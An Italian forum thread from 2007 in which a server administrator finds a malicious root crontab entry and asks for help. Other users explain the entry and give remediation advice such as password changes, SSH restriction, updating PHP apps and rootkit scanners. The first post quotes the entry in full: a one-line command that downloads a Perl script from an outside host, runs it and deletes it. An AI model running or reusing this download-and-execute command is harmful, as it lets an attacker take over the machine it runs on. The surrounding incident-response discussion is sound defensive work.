Utility
Home Messaggi odierni FAQ Ricerca avanzata Lo staff del forum Regolamento Utenti Archivio
Visualizzazione dei risultati da 1 a 7 su 7
  1. 31-05-2007, 12:20 #1
    fleone
    fleone non è in linea
    Utente di HTML.it L'avatar di fleone
    Registrato dal
    Jun 2001
    Messaggi
    149
    Invia un messaggio tramite ICQ a fleone

    strano comando nel crontab

    Salve a tutti,

    stamattina ho trovato il server fermo... non capivo il motivo e ho chiesto il riavvio manuale per vedere cosa fosse successo ma niente... tutto sembrava normale. Poi, dopo un paio d'ore, ha ricominciato a rallentarsi fino a che non ho dovuto richiedere il riavvio manuale.
    Dopo circa 4 ore di ricerche ho trovato questo comando nel crontab eseguito ongni minuto e tutti i crontab impostati eliminati:

    cd /etc/ppp;wget htph.com/.jpg/x;fetch http://htph.com/.jpg/x;perl x;rm -rf x*

    htph.com ... è un sito di veterinari... che non centra un cavolo conil nostro lavoro...
    Qualcuno ha idea che cosa faccia 'sto comando.. e soprattutto come diamine ha fatto ad arrivare nel crontab.. come ROOT?!!!! (qualcuno mi suggerirà di cambiare la password... ma vorrei capire come faccio a sapere da dove è arrivato)

    Grazie a tutti.
    Rispondi quotando Rispondi quotando
  2. 31-05-2007, 12:29 #2
    paolino_delta_t
    paolino_delta_t non è in linea
    Utente di HTML.it L'avatar di paolino_delta_t
    Registrato dal
    Apr 2005
    Messaggi
    3,401
    devi modificare un pochettino le impostazioni di sicurezza del tuo server...

    l'hacker è entrato indovinando la password, potrebbero essere coinvolti gli stessi tecnici del tuo hoster....

    per esempio a me tempo fa capitò una cosa del genere con un VPS....si trattava di uno dei tecnici della società che aveva fatto il furbo e stava usando il mio VPS per attaccare altri siti....a quel punto ho settato SSH in modo che concedesse l'accesso solo al mio IP e ho chiuso tutti i virtual terminal in modo che nessuno dei tecnici potesse entrare nel mio VPS.....

    purtroppo questo genere di cose accade in continuo, un server va amministrato con abilità e paranoia
    Rispondi quotando Rispondi quotando
  3. 31-05-2007, 12:32 #3
    fleone
    fleone non è in linea
    Utente di HTML.it L'avatar di fleone
    Registrato dal
    Jun 2001
    Messaggi
    149
    Invia un messaggio tramite ICQ a fleone
    Si, hai ragione, ma io le password le ho cambiate tutte e loro non le conoscono... comunque, andrò a guardare nei log per vedere se ci sono stati accessi verso l'1 di stanotte... più o meno è quello l'orario.
    Rispondi quotando Rispondi quotando
  4. 01-06-2007, 15:42 #4
    stai_tranquillo
    stai_tranquillo non è in linea
    Utente di HTML.it L'avatar di stai_tranquillo
    Registrato dal
    Mar 2005
    Messaggi
    933
    il comando scarica il file che vedi qui

    http://htph.com/.jpg/x

    e lo lancia.

    poi lo rimuove per cancellarne le tracce..

    lo scriptino a occhio e croce sembra essere stato creato per fare un DOS a qualcuno

    (a un primo superficiale esame sembra così)

    la cosa carina è che sembra che quel qualcuno sia il server stesso sul quale risiede lo script

    io in ordine cambierei le pass, avviserei chi di dovere (l'admin del server di htph.com) e farei un giretto in cerca di rootkit installati in locale....
    Ci sono cose che non si possono sapere. Per tutto il resto c'è man

    Prima di fare domande stupide: 1) googla 2) leggi le manpages 3) sparati.
    Rispondi quotando Rispondi quotando
  5. 01-06-2007, 16:23 #5
    fleone
    fleone non è in linea
    Utente di HTML.it L'avatar di fleone
    Registrato dal
    Jun 2001
    Messaggi
    149
    Invia un messaggio tramite ICQ a fleone
    ciao "stai_tranquillo",

    ho scaricato i logs del pannello di controllo (plesk) e ho trovato questo:

    17.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'UebiMiau-2.7-4' => 'UebiMiau-2.7-4')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'AutoIndex-1.5.1-2' => 'AutoIndex-1.5.1-2')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'WebCalendar-0.9.45-1' => 'WebCalendar-0.9.45-1')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'CSLH-2.9.8-1' => 'CSLH-2.9.8-1')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'WebShopmanager-2.0-2' => 'WebShopmanager-2.0-2')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'Coppermine-1.3.2-6' => 'Coppermine-1.3.2-6')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'WordPress-1.2.1-1' => 'WordPress-1.2.1-1')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'DocFAQ-1.71-4' => 'DocFAQ-1.71-4')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'b2evolution-0.9.0.11-2' => 'b2evolution-0.9.0.11-2')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'Mambo-4.5.1-6' => 'Mambo-4.5.1-6')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'bbclone-0.46a-1' => 'bbclone-0.46a-1')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'Owl-0.73-3' => 'Owl-0.73-3')
    217.174.249.1 admin [2007-05-30 16:48:04] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'gallery-1.4.4-3' => 'gallery-1.4.4-3')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'PostNuke-0.750-2' => 'PostNuke-0.750-2')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'TUTOS-1.82-1' => 'TUTOS-1.82-1')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'Tellme-1.2-3' => 'Tellme-1.2-3')
    217.174.249.1 admin [2007-05-30 16:48:04] 'Uninstall Site Application Package' ('Package name': 'AdvancedPoll-2.03-1' => 'AdvancedPoll-2.03-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'UebiMiau-2.7.8-2' => 'UebiMiau-2.7.8-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpMoney-1.3-6' => 'phpMoney-1.3-6')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'DocFAQ-1.71-5' => 'DocFAQ-1.71-5')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpsurveyor-0.98-6' => 'phpsurveyor-0.98-6')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'pLog-0.3.2-1' => 'pLog-0.3.2-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'WebCalendar-1.0-2' => 'WebCalendar-1.0-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpMyFamily-1.4.0-2' => 'phpMyFamily-1.4.0-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'gallery-2.0-5' => 'gallery-2.0-5')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'typo-3.7-1' => 'typo-3.7-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpAds-2.0-1' => 'phpAds-2.0-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'WebShopmanager-2.0-3' => 'WebShopmanager-2.0-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpsurveyor-0.98-7' => 'phpsurveyor-0.98-7')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'gtchat-0.93-3' => 'gtchat-0.93-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'xrms-1.18-1' => 'xrms-1.18-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpBB-2.0.11-2' => 'phpBB-2.0.11-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'WordPress-1.5.1-2' => 'WordPress-1.5.1-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpWiki-1.3.11-3' => 'phpWiki-1.3.11-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'Owl-0.80-3' => 'Owl-0.80-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'AdvancedPoll-2.03-2' => 'AdvancedPoll-2.03-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpBook-1.50-3' => 'phpBook-1.50-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'xrms-1.18-2' => 'xrms-1.18-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'pLog-1.0-3' => 'pLog-1.0-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpAds-2.0.4-3' => 'phpAds-2.0.4-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'AutoIndex-1.5.2-3' => 'AutoIndex-1.5.2-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpBugTracker-1.19-1' => 'phpBugTracker-1.19-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'Mambo-4.5.2-2' => 'Mambo-4.5.2-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'PostNuke-0.750-3' => 'PostNuke-0.750-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpBB-2.0.11-3' => 'phpBB-2.0.11-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'b2evolution-0.9.0.11-3' => 'b2evolution-0.9.0.11-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpDig-1.85-1' => 'phpDig-1.85-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'osCommerce-2.2ms2-6' => 'osCommerce-2.2ms2-6')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'Tellme-1.2-4' => 'Tellme-1.2-4')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpBook-1.50-4' => 'phpBook-1.50-4')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'bbclone-0.48-4' => 'bbclone-0.48-4')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpMoney-1.3-5' => 'phpMoney-1.3-5')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'gtchat-0.93-2' => 'gtchat-0.93-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'openbiblio-0.5-10' => 'openbiblio-0.5-10')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'TUTOS-1.88-2' => 'TUTOS-1.88-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpBugTracker-1.19-2' => 'phpBugTracker-1.19-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'Coppermine-1.3.2-7' => 'Coppermine-1.3.2-7')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpMyFamily-1.4.0-1' => 'phpMyFamily-1.4.0-1')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'openbiblio-0.5-9' => 'openbiblio-0.5-9')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'typo-3.7-2' => 'typo-3.7-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'phpDig-1.85-2' => 'phpDig-1.85-2')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Install Site Application Package' ('Package name': 'CSLH-2.10.5-3' => 'CSLH-2.10.5-3')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'phpWiki-1.2-8' => 'phpWiki-1.2-8')
    217.174.249.1 admin [2007-05-30 16:48:05] 'Uninstall Site Application Package' ('Package name': 'osCommerce-2.2ms2-5' => 'osCommerce-2.2ms2-5')
    217.174.249.1 admin [2007-05-30 16:49:11] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')
    217.174.249.1 admin [2007-05-30 19:55:51] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-30 19:55:51] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-30 19:56:58] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')
    217.174.249.1 admin [2007-05-30 19:56:59] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')
    217.174.249.1 admin [2007-05-30 21:58:39] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-30 22:00:20] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')
    217.174.249.1 admin [2007-05-31 00:01:30] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-31 00:02:37] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')
    217.174.249.1 admin [2007-05-31 00:12:30] 'CP User Login' ('Contact Name': '' => 'Fabio LEONE')
    217.174.249.1 admin [2007-05-31 00:13:36] 'CP User Logout' ('Contact Name': 'Fabio LEONE' => '')

    praticamente qualcuno è entrato come admin da pannello di controllo dall'indirizzo 217.174.249.1. E' un indirizzo IP inglese. Ora, come da vostro consiglio, ho cambiato le passwords e ho anche disattivato il pannello di controllo in modo tale da accedere al server solo via ssh da un unico indirizzo ip... però... potresti darmi un consiglio a riguardo?... come li trovo i rootkit? Grazie in anticipo per la risposta.

    Fabio.
    Rispondi quotando Rispondi quotando
  6. 02-06-2007, 18:37 #6
    stai_tranquillo
    stai_tranquillo non è in linea
    Utente di HTML.it L'avatar di stai_tranquillo
    Registrato dal
    Mar 2005
    Messaggi
    933
    Originariamente inviato da fleone

    praticamente qualcuno è entrato come admin da pannello di controllo dall'indirizzo 217.174.249.1. E' un indirizzo IP inglese. Ora, come da vostro consiglio, ho cambiato le passwords e ho anche disattivato il pannello di controllo in modo tale da accedere al server solo via ssh da un unico indirizzo ip... però... potresti darmi un consiglio a riguardo?... come li trovo i rootkit? Grazie in anticipo per la risposta.

    Fabio.
    Eh si, proprio così... e quel qualcuno potrebbe anche essere uno script.

    Per il futuro, usa sempre versioni aggiornate di tutte le webapp php.. purtroppo il rovescio della medaglia dell'opensource è proprio che i bug e i relativi scriptini per sfruttarli sono di pubblico dominio.. spesso appena scoperto un bug e prima ancora che esca una versione aggiornata.

    Comunque è buona norma lasciare il minimo indispensabile di "vie d'accesso" al proprio server.
    Ergo.. se hai possibilità di usare ssh, non serve lasciare aperti altri pannellini di controllo. Con ssh puoi fare tutto e come protocollo è sicuro.
    Non appoggerei mai l'amministrazione del mio server o dati importanti nelle mani di qualcosa che passa anche lontanamente per apache/php...........

    Per i rootkit, ci sono diversi tools. chkrootkit, rkhunter ..

    E' buona norma fare periodicamente controlli di questo tipo (oltre che controllare i log e cambiare periodicamente le password).

    ciao
    Ci sono cose che non si possono sapere. Per tutto il resto c'è man

    Prima di fare domande stupide: 1) googla 2) leggi le manpages 3) sparati.
    Rispondi quotando Rispondi quotando
  7. 05-06-2007, 10:13 #7
    fleone
    fleone non è in linea
    Utente di HTML.it L'avatar di fleone
    Registrato dal
    Jun 2001
    Messaggi
    149
    Invia un messaggio tramite ICQ a fleone
    Originariamente inviato da stai_tranquillo
    Eh si, proprio così... e quel qualcuno potrebbe anche essere uno script.

    Per il futuro, usa sempre versioni aggiornate di tutte le webapp php.. purtroppo il rovescio della medaglia dell'opensource è proprio che i bug e i relativi scriptini per sfruttarli sono di pubblico dominio.. spesso appena scoperto un bug e prima ancora che esca una versione aggiornata.

    Comunque è buona norma lasciare il minimo indispensabile di "vie d'accesso" al proprio server.
    Ergo.. se hai possibilità di usare ssh, non serve lasciare aperti altri pannellini di controllo. Con ssh puoi fare tutto e come protocollo è sicuro.
    Non appoggerei mai l'amministrazione del mio server o dati importanti nelle mani di qualcosa che passa anche lontanamente per apache/php...........

    Per i rootkit, ci sono diversi tools. chkrootkit, rkhunter ..

    E' buona norma fare periodicamente controlli di questo tipo (oltre che controllare i log e cambiare periodicamente le password).

    ciao
    Grazie! Siete stati di grande d'aiuto, spero un giorno di poter contraccambiare.

    Saluti e buon lavoro a tutti.

    Fabio.
    Rispondi quotando Rispondi quotando
« Discussione precedente | Prossima discussione »

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  

Regole del Forum

Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.